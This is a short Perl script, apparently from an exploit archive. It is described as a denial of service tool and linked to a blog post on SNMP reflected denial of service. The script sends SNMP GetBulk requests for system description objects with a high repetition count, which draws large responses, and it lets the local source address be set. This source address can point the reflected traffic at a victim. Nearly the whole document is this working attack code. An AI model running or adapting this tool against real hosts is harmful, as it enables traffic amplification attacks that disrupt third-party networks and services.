This code is a denial of service tool that performs bulk SNMP requests with large string responses.
8263a8b0e91e7c1fb9835de0cdefc40e98aee1db6099327458651b13402c03e9
#!/usr/bin/perl
# Simple SNMP bulk request with large string responses
# Written by Anestis Bechtsoudis
# More info at SNMP RDoS blog post:
# https://bechtsoudis.com/hacking/snmp-reflected-denial-of-service/
use strict;
use warnings;
use Net::SNMP;
# SNMP Objects
my @OID = ('1.3.6.1.2.1.1.1', #sysDescr
'1.3.6.1.2.1.1.9.1.3', #sysORDescr
);
# SNMP Session
my ($session, $error) = Net::SNMP->session(
-localaddr => shift || '10.0.1.11',
-hostname => shift || '10.0.1.1',
-community => shift || 'public',
-version => shift || 'snmpv2c',
);
# Print error if any
if (!defined $session) {
print "ERROR: $error\n";
exit 1;
}
# Send SNMP bulk request
my $result = $session->get_bulk_request(
-varbindlist => [@OID],
-nonrepeaters => 1,
-maxrepetitions => 70,
);
# Check for errors
if (!defined $result) {
print "ERROR: ".$session->error()."\n";
$session->close();
exit 1;
}
# Close SNMP session
$session->close();